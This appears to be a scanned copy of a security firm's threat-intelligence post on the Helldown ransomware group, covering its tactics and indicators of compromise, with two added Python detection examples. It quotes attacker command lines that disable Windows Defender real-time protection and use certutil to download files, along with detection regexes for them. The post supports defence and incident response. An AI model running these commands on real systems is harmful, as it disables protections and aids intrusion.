www.truesec.com
185.195.92.48  Public Scan

URL: https://www.truesec.com/hub/blog/helldown-ransomware-group
Submission: On November 21 via api from IN — Scanned from DE



Threat Insight


HELLDOWN RANSOMWARE GROUP – A NEW EMERGING RANSOMWARE THREAT

During October 2024, the Truesec CSIRT team was engaged in incidents related to
a newly emerged ransomware group, Helldown. As of November 2024, online
resources describing the Helldown ransomware group's tactics, techniques and
procedures (TTPs) were effectively non-existent. This blog post aims to address
that gap and will be updated continuously as more investigations are completed.

 * Stephan Khader Boelt
 * 2024-11-07
 * Insight



INTRODUCTION

The Helldown ransomware group has emerged as a new player in the ransomware
space during Q3 of 2024. Based on the victims listed on their leak site, the
group has been agnostic regarding which sectors it targets: the list of victims
contains museums, cargo transport companies and, notably, the network equipment
manufacturer Zyxel.

The threat actor (TA) displayed a higher level of sophistication than, for
example, the Akira ransomware group in the early stages of their compromises,
and relies on living-off-the-land techniques rather than employing a C2
framework.

Recent incidents showed that the group thoroughly removes tools utilized during
a compromise, and also overwrites the free disk space on the hard drives of
different machines, in an attempt to hinder the recovery process and reduce the
effectiveness of file carving.

(Figure: ransomware note)


TECHNICAL DETAILS


INITIAL ACCESS

The Truesec CSIRT has primarily observed the Helldown ransomware group obtaining
initial access through Zyxel firewalls. More specifically, one investigation
showed that the TA accessed the victim's environment directly from the LAN IP
address of the victim's internet-facing Zyxel firewall.

Based on tests conducted on victims' externally facing firewalls, the default
behaviour should assign an authenticated SSL-VPN user an IP address from a
predefined pool, 10.10.11.0/24, and any traffic from an SSL-VPN connected client
towards the internal LAN would be sourced from that assigned IP address. Despite
this expected behaviour, traffic was sourced from 192.168.1.1 when the TA
authenticated to any of the internal machines in the victim's environment. The
forensic team was unable to investigate the underlying operating system of the
compromised firewalls and, as such, could not positively confirm whether the
threat actor used the SSL-VPN service to access the victim's environment or
whether the firewall device itself had been compromised via an exploit. The
evidence points towards the latter.

The same investigation also showed that a user account was created on the
externally facing firewall as part of the compromise. It was not confirmed
whether the user was created during a possible exploitation of the operating
system, or post-breach.


PERSISTENCE

During their compromise, the Helldown group was observed creating local accounts
on the Zyxel firewalls [T1078.003] to establish persistence in the victim's
environment.


CREDENTIAL ACCESS AND DISCOVERY

Helldown was observed employing mimikatz to dump credentials from the victim's
Active Directory [T1003], as well as manually downloading Advanced Port Scanner
directly from GitHub, through either the web browser or certutil.exe [T1105],
to perform network enumeration [T1046].


DEFENCE EVASION

Two methods of disabling local anti-virus were observed during recent
investigations. The first was manually disabling real-time protection using
PowerShell. The second was employing hrsword.exe to disable endpoint protection
software on a given machine [T1562.001].


LATERAL MOVEMENT

The TA was observed utilizing the default Windows RDP client "mstsc.exe", as
well as TeamViewer, to conduct the majority of their activities and move around
the network [T1021.001]. Additionally, psexec.exe was used to execute programs
on remote machines.


IMPACT

The group deployed ransomware as part of their compromise to blackmail victims
into paying an unspecified ransom [T1486]. Despite having performed a full AD
compromise, recent cases showed that they only deployed their own encrypter,
"hellenc.exe", on specific machines in the environment.


RANSOMWARE EXECUTION ANALYSIS

The ransomware encrypter, named "hellenc.exe", removed itself from the hard
drive during execution and forced a system restart, leaving only metadata
behind. The most reliable sources of evidence for this file have been Amcache
and Shimcache entries, while MFT and $J entries were missing on machines
post-execution.

Evidence from a recent investigation showed an Amcache entry for the file,
providing a file size and a link timestamp (LinkDate) for the most recent time
it was compiled.

 {
   "ApplicationName": "Unassociated",
   "ProgramId": "0006f430f38745a2af2bd0f21acc33e77f790000ffff",
   "FileKeyLastWriteTimestamp": "REDACTED",
   "SHA1": "2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0",
   "IsOsComponent": "False",
   "FullPath": "c:\\users\\REDACTED\\desktop\\hellenc.exe",
   "Name": "Hellenc.exe",
   "FileExtension": ".exe",
   "LinkDate": "2024-08-02 06:48:50",
   "ProductName": "",
   "Size": "669184",
   "Version": "",
   "ProductVersion": "",
   "LongPathHash": "hellenc.exe|7c6c79ee2f8d3787",
   "BinaryType": "pe32_i386",
   "IsPeFile": "False"
 }

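As an added example (not part of the original post), the following Python
triage routine checks Amcache entries of the form shown above against the
indicators listed later in this post. The SHA1 values and file names come from
the post's IOC table; the function names and the benign sample entry are
constructed for illustration.

```python
"""Triage Amcache entries (e.g. a JSON export from an Amcache parser) against
the Helldown indicators named in the post. Added example; indicator values are
from the post, the sample data and function names are constructed."""
import json

# SHA1 hashes from the post's IOC table, lowercased for case-insensitive match
KNOWN_SHA1 = {
    "2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0": "hellenc.exe (Helldown encrypter)",
    "1be0a62694883c4cc30ce7a6358af9953e7b41f4": "xx.ico (Helldown ransom icon)",
}
# Tool names from the post's IOC table
KNOWN_NAMES = {"hellenc.exe", "hrsword.exe", "hs.exe", "mimikatz.exe",
               "advanced_port_scanner.exe", "xx.ico"}

def triage_entry(entry):
    """Return the list of reasons an Amcache entry looks Helldown-related."""
    reasons = []
    sha1 = entry.get("SHA1", "").lower()
    name = entry.get("Name", "").lower()
    if sha1 in KNOWN_SHA1:
        reasons.append(f"SHA1 matches IOC: {KNOWN_SHA1[sha1]}")
    if name in KNOWN_NAMES:
        reasons.append(f"file name matches tool list: {name}")
    # A non-OS binary run from a user profile is only a weak signal, so it is
    # reported only when a stronger indicator already matched.
    path = entry.get("FullPath", "").lower()
    if reasons and entry.get("IsOsComponent") == "False" and "\\users\\" in path:
        reasons.append("non-OS binary executed from a user profile")
    return reasons

def triage_amcache(entries):
    """Map entry Name -> reasons for every entry that hits an indicator."""
    return {e.get("Name", "?"): r for e in entries if (r := triage_entry(e))}

# Constructed sample: the entry from the post plus a benign OS component
SAMPLE = json.loads("""[
 {"Name": "Hellenc.exe", "SHA1": "2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0",
  "FullPath": "c:\\\\users\\\\REDACTED\\\\desktop\\\\hellenc.exe",
  "IsOsComponent": "False", "BinaryType": "pe32_i386"},
 {"Name": "notepad.exe", "SHA1": "0000000000000000000000000000000000000000",
  "FullPath": "c:\\\\windows\\\\system32\\\\notepad.exe",
  "IsOsComponent": "True", "BinaryType": "pe64_amd64"}
]""")

if __name__ == "__main__":
    for name, reasons in triage_amcache(SAMPLE).items():
        print(name, "->", "; ".join(reasons))
```
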
Like other ransomware encryptors, hellenc.exe added an extension to the
encrypted files: a randomized 6-letter extension using only upper- and
lower-case letters. Additionally, an accompanying .ico (icon) file named
"xx.ico" was transferred to the system. Once the ransomware file executed, it
added registry keys in the SOFTWARE hive pointing to the icon file under:

 * SOFTWARE:ROOT\Classes\.[6-letter-extension]
 * SOFTWARE:ROOT\Classes\[6-letter-extension]Icon
 * SOFTWARE:ROOT\Classes\[6-letter-extension]Icon\DefaultIcon

Once the encryption completed, a system reboot was initiated and the ransomware
file was overwritten on disk.


OVERVIEW


TOOLS AND IOCS

Name                        Description                         SHA1 hash
Hellenc.exe                 Ransomware file                     2b88d6e9475fc1e035f8e49ebb5a79d3266eccc0
Hrsword.exe / hs.exe        Tool to disable security products   -
advanced_port_scanner.exe   Network enumeration tool            -
Mimikatz.exe                Credential dumping tool             -
Mimikatz.bat                .bat version of mimikatz            -
xx.ico                      Ransomware icon file                1BE0A62694883C4CC30CE7A6358AF9953E7B41F4
Teamviewer.exe              RDP client                          -

Command Lines:

Command line:
  powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -MAPSReporting 0 -SubmitSamplesConsent 0 -UILockdown $true
Description:
  PowerShell command line to disable Windows Defender Real-time Protection

Command line:
  C:\Windows\System32\certutil.exe -urlcache -split -f https://download.advanced-port-scanner.com/download/files/Advanced_Port_Scanner_2.5.3869.exe’
Description:
  Command line used to download Advanced Port Scanner using certutil.exe
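
As an added example (not part of the original post), the following Python
detection logic runs over constructed process-creation records and flags the
tradecraft listed in the command-line table above and in the tools table: the
Set-MpPreference call disabling real-time protection, certutil.exe used as a
downloader, and execution of hrsword.exe/hs.exe. The rule names, the event
format and the hostnames are constructed; the command lines are those quoted in
the post.

```python
"""Match process command lines against the Helldown tradecraft quoted in the
post. Added example; rule names, event layout and hosts are constructed."""
import re

# Each rule: (name, pattern). Patterns are case-insensitive since the
# operator-typed command lines in the post vary in casing.
RULES = [
    # Defender real-time protection switched off via Set-MpPreference
    ("defender_realtime_disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$true", re.I)),
    # certutil.exe fetching a remote file with -urlcache (LOLBin download)
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    # The AV-killer binary names from the post's tools table
    ("hrsword_execution",
     re.compile(r"(^|\\)(hrsword|hs)\.exe\b", re.I)),
]

def match_command_line(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_events(events):
    """Return (host, rule) pairs for every event that triggers a rule."""
    return [(ev["host"], rule) for ev in events
            for rule in match_command_line(ev["cmd"])]

# Constructed process-creation records (e.g. exported Sysmon EID 1 / 4688)
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring "
                            "$true -MAPSReporting 0 -SubmitSamplesConsent 0 -UILockdown $true"},
    {"host": "ws02", "cmd": "C:\\Windows\\System32\\certutil.exe -urlcache -split -f "
                            "https://download.advanced-port-scanner.com/download/files/"
                            "Advanced_Port_Scanner_2.5.3869.exe"},
    {"host": "ws03", "cmd": "certutil.exe -hashfile C:\\temp\\file.bin SHA256"},   # benign use
    {"host": "ws04", "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"},
    {"host": "ws05", "cmd": "C:\\Users\\REDACTED\\Desktop\\hrsword.exe"},
]

if __name__ == "__main__":
    for host, rule in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```
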
